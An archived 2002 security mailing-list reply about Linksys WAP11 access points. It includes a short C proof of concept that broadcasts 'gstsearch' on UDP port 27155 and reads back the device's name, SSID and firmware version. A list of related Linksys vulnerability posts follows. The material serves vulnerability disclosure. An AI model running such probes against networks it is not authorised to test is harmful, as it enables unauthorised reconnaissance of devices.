Re: Accesspoints disclose wep keys, password and mac filter (fwd)

From: Thomas Sarlandie (sarfata@altern.org)
Date: 11/05/02 

Date: Tue, 05 Nov 2002 15:24:07 +0100
From: Thomas Sarlandie <sarfata@altern.org>
To: Tom Knienieder <knienieder@khamsin.ch>

Hi,

Linksys WAP11-V2.2 seems to be vulnerable in a different way. It only
returns AP's name,
SSID and firmware version. Except for firmware version, those are not
private informations.

Quickly patched proof of concept :

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>

typedef struct {
  char type[28];
  char blank1[8];
  char apname[32];
  char firmware[6];
  char blank2[11];
  char ssid[32];
}
__attribute__ ((packed)) answer;

int main()
{
        char rcvbuffer[1024];
        struct sockaddr_in sin;
        answer* ans = (answer *)rcvbuffer;
        int sd, ret, val;

        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = inet_addr("255.255.255.255");
        sin.sin_port = htons(27155);

        sd = socket(AF_INET, SOCK_DGRAM, 0);
        if (sd < 0)
                perror("socket");

        val = 1;
        ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
        if (ret < 0)
        {
                perror("setsockopt");
                exit(1);
        }

        ret = sendto(sd, "gstsearch", 9, 0, &sin, sizeof(struct sockaddr));
        if (ret < 0)
        {
                perror("sendto");
                exit(1);
        }

        ret = read(sd,&rcvbuffer,sizeof(rcvbuffer));
    if (ret > 0)
    {
      printf("Type : %s\n", ans->type);
      printf("Announced Name : %s\n", ans->apname);
      printf("Firmware version : %s\n", ans->firmware);
      printf("SSID : %s\n", ans->ssid);
    }
    else
      perror("read");
        return 0;
}

thomas

>KHAMSIN Security News
>KSN Reference: 2002-11-01 0001 ULO
>---------------------------------------------------------------------------
>
>Title
>-----
> Accesspoints disclose wep keys, password and mac filter
>
>Date
>----
> 2002-11-01
>
>
>
>
>

Relevant Pages

  • [NEWS] Vulnerability Report for Linksys Devices
    ... - Linksys BEFSR81. ... Firmware v1.42.7 ... Known to be vulnerable to some of the bugs here described: ... them, as far as Carlos could verify, are post authentication. ...
    (Securiteam)
  • CORE-20021005: Vulnerability Report For Linksys Devices
    ... Vulnerability Report For Linksys Devices ... Remotely exploitable Buffer overflows and Authentication ... on the internet, upload a new firmware, and perform any other configuration ...
    (Bugtraq)
  • Re: Linksys routers, SNMP issues
    ... Note that the BEFSR41 (and most likely numerous other Linksys ... the latest firmware upgrades fix most models. ... Enterprise Specific Trap Uptime: 2 days, 19:00:23.36, ...
    (Bugtraq)
  • Linksys router vulnerability
    ... Linksys products running affected firmware versions ... This bug affects ... It appears that the Linksys HTTP management interface ...
    (Bugtraq)
  • Re: Firewall Question, looking for SOHO Firewall Router recommendations
    ... used Linksys products with great success, the Linksys router I have now is ... I now looked at Linksys' site and Linksys released firmware 1.50.18 on Apr ... GRC was reporting the following as Closed. ... No open ports. ...
    (microsoft.public.backoffice.smallbiz2000)
Quantcast